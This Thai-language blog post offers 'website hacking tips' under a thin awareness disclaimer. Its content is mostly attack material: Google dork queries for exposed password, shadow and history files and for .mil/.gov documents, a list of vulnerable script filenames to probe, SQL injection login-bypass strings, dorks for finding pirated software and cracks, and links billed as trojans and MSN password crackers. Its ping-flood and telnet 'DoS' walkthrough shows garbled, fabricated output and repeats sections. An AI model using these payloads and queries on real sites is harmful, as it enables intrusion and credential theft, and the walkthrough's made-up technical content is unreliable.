Tip Hack WebSite
ขอบอกก่อนว่า พวก Hacker เป็นพวกโปรแกรมเมอร์ฝ่ายดี แต่ถ้าใช้ไปในทางที่ผิด เรียกว่า พวก Cracker เป็นอาชญากรทาง IT มีความผิดตามกฎหมาย ฉะนั้นศึกษาไว้เป็นความรู้ เพื่อรู้ทัน ไว้ป้องกัน ต้องฉลาดกว่าถึงจะรอด อย่าได้ลองใช้ไปในทางที่ผิด ถึงอย่างไรก็ตามเจอ ถ้าอยากตาม
tip เทคนิค ในวันนี้จะขอเสนอการเจาะ web site และการเจาะข้อมูลทั่วไป แบบง่ายๆให้ทุกท่านได้รับรู้ และป้องกันตัวเองได้
โดยเริ่มจาก การใช้ Google ค้นหาข้อมูลลับ เอาคำเหล่านี้ไปใส่ในช่องค้นหาของ Google ดู แล้วท่านจะพบว่าพวก Hacker เขาล้วงตับกันอย่างไร ทั้งนี้ต้องเก่งภาษาอังกฤษบ้าง
บาง web เขาจะ hack เราถ้าเข้าไป แนะนำให้ ใช้โปรแกรม แช่แข็งเครื่องเราไว้ก่อนน่าจะดี แล้วอย่ากดดาวโหลดอะไร ถ้ามันขึ้นได้ดาวโหลด
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
inurl: passwd filetype:txt
inurl: admin filetype:db
inurl: iisadmin
inurl: "auth_user_file.txt"
inurl: "wwwroot/*."
top secret site:mil
confidential site:mil
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
ALTERNATIVE INPUTS====================
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.aspdvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi
posted by AGRESSSORS @ 6:13 PM
Again Google
This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information.
http://www.google.com/search?hl= ... sql&btnG=Search
----------------------------------------------------------------------------------------
These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to.
http://www.google.com/search?hl= ... Alog+username+putty
----------------------------------------------------------------------------------------
These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.
http://www.google.com/search?hl= ... A%22password.log%22
---------------------------------------------------------------------------------------
This file contains port number, version number and path info to MySQL server.
http://www.google.com/search?hl= ... onf+OR+mysql_config
-----------------------------------------------------------------------------------------
This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file.
http://www.google.com/search?hl= ... +filetype%3Aswf+swf
--------------------------------------------------------------------------------------
These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target.
http://www.google.com/search?hl= ... 2Bintext%3A%22To%22
----------------------------------------------------------------------------------------
This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases.
http://www.google.com/search?num ... net+account+manager
---------------------------------------------------------------------------------------
คำค้นหา อาจจะมากกว่านี้ลองเอาไปประยุกต์ใช้กันดู
โดยดัดแปลคำข้างใน
-------------------------------------------------------------------------------------------------------------
คำสั่งเจาะระบบ login (อาจใช้ได้กับ Web site ที่เขียนเองโดยป้องกันไม่เป็น)
or''='
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
อันนี้เป็นการ Hack เว็บที่ใช้ฐานข้อมูลเป็น SQL ซึ่งตามที่ต่างๆก็จะอุด Bug ตรงส่วนนี้ไว้เรียบร้อยแล้ว
แต่ก็มีบาง Web site (Script เขียนเองซึ่งมักจะเป็นเว็บไซต์ของโรงเรียน หรือเว็บส่วนบุคคล) ที่มักจะมีรูรั่วนี้ พลาดออกมาให้เห็น
หลังจากที่การ Login ฟลุ๊คเ้ข้าไปได้
ค่าที่เป็นไปได้หลังจากการ login ก็คือ
1.ได้รับสิทธิ์ของ User นั้นๆ
2.ได้รับสิทธ์เท่ากับคนอื่นๆ
3.ได้รับสิทธ์เป็นผู้ใช้ที่อยู่อันดับแรก หรือท้ายของตาราง (admin)
4. ไม่ได้อะไร
นอกจากใช้คำสั่งเหล่านี้ ยังมีคำสั่งอื่นๆที่สามารถใช้ได้อีก เช่น
SELECT * FROM User WHERE
SELECT * FROM * WHERE
'GROUP BY username;--
'employee.feild'
เป็นต้น
ซึ่งเป็นคำสั่ง SQL สามารถหาความรู้ได้จากที่ต่างๆใน internet
การป้องกันโดยพื้นฐานนั้นก็คือ การกรองค่าอักขระแบบแปลกๆออกไปจากข้อความที่รับเข้ามา เช่น &!@#$%^ เป็นต้น หรือการจำกัดความยาวของช่องรับข้อความ ก็เป็นอีกหนึ่งวิธีที่น่าสนใจ หรือไม่ก็ให้พวกโปรแกรมเมอร์ที่เขียน Web เก่งๆ ตรวจอีกที หรือไม่ก็ทดลอง Hack Web ตัวเองดู ฯลฯ
.............................................................................................................................................................
: 3 วิธี ใช้ Google Hack หาสิ่งที่เราต้องการ :
สามวิธี ใน Google ที่ให้ได้มาซึ่งทุกอย่าง ที่อยากดาวน์โหลด ในอินเตอร์เน็ต
คำแนะนำ สามารถใช้วิธีนี้ ในการหาดาวน์โหลดโปรแกรม
แคร็ก ซีดี คีย์ หรือต่างๆนานา ที่อยากได้
แต่ขอแนะนำว่า ควรจะดาวน์โหลด มาเพื่อการทดลอง ทดสอบ หรือการศึกษาเท่านั้น หากชอบ ให้ซื้อโปรแกรมนั้นๆ
วิธีที่หนึ่ง
พิมพ์คำเหล่านี้ ใน Google Search
(1)
" parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(2)
" parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(3)
" parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(4)
" parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(5)
" parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(6)
" parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
หมาย เหตุ ให้คุณเปลี่ยน คำที่ตามหลัง parent directory เช่น MP3 Gamez appz DVDRip เป็นสิ่งที่คุณอยากได้ แล้วก้อค้นหา คุณจะพบกับ ความมหัศจรรย์ใน Google
วิธีที่สอง
พิมพ์คำต่อไปนี้ใน Google
?intitle:index.of? mp3
จากนั้นแค่เพิ่มชื่อ เพลง อัลบั้ม นักร้อง ลงไป
เช่น ?intitle:index.of? mp3 myfavoritesongs
วิธีที่สาม
พิมพ์คำต่อไปนี้ใน Google
inurl:micr0s0f filetype:iso
จากนั้น ก้อเปลี่ยน คำว่า micr0s0f กับคำว่า iso เป็นคำที่คุณต้องการ
เช่น inurl:myc0mpany filetype:zip
วิธีที่หนึ่ง
พิมพ์คำเหล่านี้ ใน Google Search
(1)
" parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(2)
" parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(3)
" parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(4)
" parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(5)
" parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
(6)
" parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
หมาย เหตุ ให้คุณเปลี่ยน คำที่ตามหลัง parent directory เช่น MP3 Gamez appz DVDRip เป็นสิ่งที่คุณอยากได้ แล้วก้อค้นหา คุณจะพบกับ ความมหัศจรรย์ใน Google
วิธีที่สอง
พิมพ์คำต่อไปนี้ใน Google
?intitle:index.of? mp3
จากนั้นแค่เพิ่มชื่อ เพลง อัลบั้ม นักร้อง ลงไป
เช่น ?intitle:index.of? mp3 myfavoritesongs
วิธีที่สาม
พิมพ์คำต่อไปนี้ใน Google
inurl:micr0s0f filetype:iso
จากนั้น ก้อเปลี่ยน คำว่า micr0s0f กับคำว่า iso เป็นคำที่คุณต้องการ
เช่น inurl:myc0mpany filetype:zip
..............................................................................................................................................................
วิธีที่ Hacker เจาะ Server โดยใช้ Dos (การ ping เครื่อง) วิธีนี้จะทำให้ Server หรือ Web site ล่ม ส่วนมากพวก Hacker จะปลอมตัว หรือปลอม IP address โดยใช้ Proxy Server เข้าไปก่อกวน เป็นการกระทำที่ผิดกฎหมาย ปกติแล้ว ถ้าไม่เป็น Server หรือ Web ของรัฐบาล หรือบริษัทใหญ่ๆ แล้ว ก็จะไม่ตาม Hacker พวกนี้ ซึ่งสามารถตามได้ โดยดู IP หลังซ่อน IP อีกที
พอได้ IP มาแล้วก็ตามไปเช็ค
(IP Address นั้น มีอยู่ 2 แบบ คือ Public IP และ Private IP
Public IP คือ IP ตอนที่เชื่อมต่อเข้าอินเตอร์เน็ต จะเปลี่ยนไปเรื่อยๆ ถ้าต่อเน็ตไหม่ เป็น IP จริง
Private IP คือ คอมพิวเตอร์ที่เชื่อมต่อในระบบแลน จะถูกกำหนดไว้เอง คือ IP ที่ขึ้นต้นด้วย 192.168.0.0 เป็น IP ปลอม)
Private IP คือ คอมพิวเตอร์ที่เชื่อมต่อในระบบแลน จะถูกกำหนดไว้เอง คือ IP ที่ขึ้นต้นด้วย 192.168.0.0 เป็น IP ปลอม)
เว็บที่ใช้เช็ค IP
เช่น เช็คที่
หรือที่
เป็นต้น
1. เข้าไปที่ start/run/พิมพ์ cmd/กด OK/พิมพ์คำว่า netstat -n เพื่อแสดงการเชื่อมต่อของเครื่องกับภายนอก
2. ใช้คำสั่ง ping -f ตามด้วยชื่อเว็ปไซด์
เช่น ping -f http://www.ragnarok.com
ตัวอย่างผลลัพท์ที่ได้
ตัวอย่างผลลัพท์ที่ได้
Reply from server$$%$$ /-/-/-/ $$%$$ code trojanz: bytes=32 time<1ms TTL=128
Reply from 203.116.93.2: bytes=32 time<1ms TTL=128
Reply from ping for 203.116.93.2: bytes=32 time<1ms TTL=128
Reply from http://www.ragnarok.com 23 !@error@!: bytes=32 time<1ms TTL=128
Reply from 203.116.93.2: bytes=32 time<1ms TTL=128
Reply from ping for 203.116.93.2: bytes=32 time<1ms TTL=128
Reply from http://www.ragnarok.com 23 !@error@!: bytes=32 time<1ms TTL=128
3.ทดสอบว่า เว๊ปไซด์ เปิด port ให้หรือไม่
Received sent port
Bytes 97111 97111 23
Unicast packets 1616 1616 25
Non-unicast packets 0 0 22
Discards 0 0 25
Errors 0 0 21
Unknown protocols 0 0 0
Port 0 0 *23* ( แสดงว่า เปิด port 23 )
4. telnet เข้าไปที่เครื่อง server
cmd - telnet 203.116.93.2 port 23 connection wait .......
coneted : user - somchai
Received sent port
Bytes 97111 97111 23
Unicast packets 1616 1616 25
Non-unicast packets 0 0 22
Discards 0 0 25
Errors 0 0 21
Unknown protocols 0 0 0
Port 0 0 *23* ( แสดงว่า เปิด port 23 )
4. telnet เข้าไปที่เครื่อง server
cmd - telnet 203.116.93.2 port 23 connection wait .......
coneted : user - somchai
pass - **********
กด Enter
Web ที่พวก Hacker นำเครื่องมือมาใช้ บางส่วน
กด Enter
Web ที่พวก Hacker นำเครื่องมือมาใช้ บางส่วน
1. http://www.foundstone.com <<< สแกน IP
2. http://www.hide-ip-soft.com <<< โปรแกรมซ่อน IP
3. http://www.nirsoft.net <<< ถอดรหัสพาสเวิร์ด MSN
4. http://www.awinsoft.com <<< ดักจับข้อความสนทนาในMSN
5. http://www.awinsoft.com <<< โทรจัน
6. http://expmedia.hosk.sk <<<ไวรัส และโทรจันต่างๆ (ไม่มีแล้ว)
2. http://www.hide-ip-soft.com <<< โปรแกรมซ่อน IP
3. http://www.nirsoft.net <<< ถอดรหัสพาสเวิร์ด MSN
4. http://www.awinsoft.com <<< ดักจับข้อความสนทนาในMSN
5. http://www.awinsoft.com <<< โทรจัน
6. http://expmedia.hosk.sk <<<ไวรัส และโทรจันต่างๆ (ไม่มีแล้ว)
Debit All Admin In Thailand
โฆษณา แพนด้า
F U
L U
Credit All Hacker In The World
Debit All Crack In The World
ไม่มีความคิดเห็น:
แสดงความคิดเห็น